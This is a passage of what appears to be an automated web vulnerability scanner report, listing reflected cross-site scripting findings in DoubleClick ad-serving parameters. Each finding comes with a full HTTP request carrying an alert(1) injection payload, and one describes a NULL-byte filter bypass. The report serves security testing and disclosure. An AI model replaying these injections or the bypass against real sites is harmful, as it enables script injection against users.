Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:13:27 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:13:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7182

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxAa8e24"-alert(1)-"68e3df219f9&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225");
var fsc
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f8a5"-alert(1)-"9a5b399f5f2 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-40638789337809129f8a5"-alert(1)-"9a5b399f5f2&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:15:40 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:15:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7182

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
i94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-40638789337809129f8a5"-alert(1)-"9a5b399f5f2&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C151S512N0B2A1D687E0000V102%26promo%3DBCXXX04225");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8293c"-alert(1)-"5a363da0fe6 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=18293c"-alert(1)-"5a363da0fe6&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:14:10 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:14:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7191

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
EwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=18293c"-alert(1)-"5a363da0fe6&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP111C519S512N0B2A1D688E0000V101%26promo%3DBCXXX04226");
var fscUrl =
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8acd0"-alert(1)-"583d7c1bf92 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg8acd0"-alert(1)-"583d7c1bf92&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 07 Mar 2011 13:15:03 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 13:15:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7143

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg8acd0"-alert(1)-"583d7c1bf92&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP61C519S512N0B2A1D573E0000V102%26promo%3DHOSTING599");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0073ec1"-alert(1)-"252bbba8c84 was submitted in the sz parameter. This input was echoed as 73ec1"-alert(1)-"252bbba8c84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this filtering can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l%0073ec1"-alert(1)-"252bbba8c84&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNvbS5odG1suAIYwAIFyALl78UYqAMB0QNNxtOXVCOvkegD3AXoA7oC6APiBfUDAAAAxA&num=1&sig=AGiWqtyklQ5zrv2l-FIaE5i46j2_kXQNIg&client=ca-pub-4063878933780912&adurl=;ord=1467384676? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299525182&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fx%2Fb%2Fxss-dork-cross-site-scripting-blekko.com.html&dt=1299503582575&shv=r20101117&jsv=r20110208&saldr=1&correlator=1299503582597&frm=0&adk=1607234649&ga_vid=1043384173.1299503583&ga_sid=1299503583&ga_hid=1378436686&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1609&bih=1006&fu=0&ifi=1&dtd=52&xpc=VBJ7QBfkhZ&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7060
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 13:12:56 GMT
Expires: Mon, 07 Mar 2011 13:12:56 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ac3/7/1a9/%2a/m%3B234427573%3B0-0%3B0%3B50265527%3B3454-728/90%3B38432219/38449976/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l%0073ec1"-alert(1)-"252bbba8c84&ai=B8tg3uNl0TaPeMNf2lQeK34mNBpWpie8BhaKK8hLjqLazM8DwkwIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAUBmaWxlOi8vL0M6L2Nkbi94L2IveHNzLWRvcmstY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctYmxla2tvLmNv
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afbfa'-alert(1)-'59510ce7fea was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70afbfa'-alert(1)-'59510ce7fea&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:40:15 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:40:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a6/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70afbfa'-alert(1)-'59510ce7fea&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6fcd'-alert(1)-'419279fa279 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028a6fcd'-alert(1)-'419279fa279&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:39:36 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:39:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a6/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028a6fcd'-alert(1)-'419279fa279&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec6ca'-alert(1)-'f51a1f2bbf was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bec6ca'-alert(1)-'f51a1f2bbf&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:40:55 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:40:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 519

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a5/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bec6ca'-alert(1)-'f51a1f2bbf&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3fe5'-alert(1)-'94dbc11099d was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=c3fe5'-alert(1)-'94dbc11099d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 520
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:41:33 GMT
Expires: Mon, 07 Mar 2011 01:41:33 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a6/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=c3fe5'-alert(1)-'94dbc11099dhttps%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.14

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e51c3'-alert(1)-'5d2e0e24608 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.14;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=59956497948800832e51c3'-alert(1)-'5d2e0e24608&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=59956497948800832? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/creative.php?pageid=Dictionary&placement=MW_DICT_300_TOP&groupid=8308787085&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Mar 2011 01:39:11 GMT
Vary: Accept-Encoding
Expires: Mon, 07 Mar 2011 01:39:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ac3/c/a6/%2a/o;235638522;0-0;0;59396927;4307-300/250;40463869/40481656/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=59956497948800832e51c3'-alert(1)-'5d2e0e24608&mt_id=111028&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
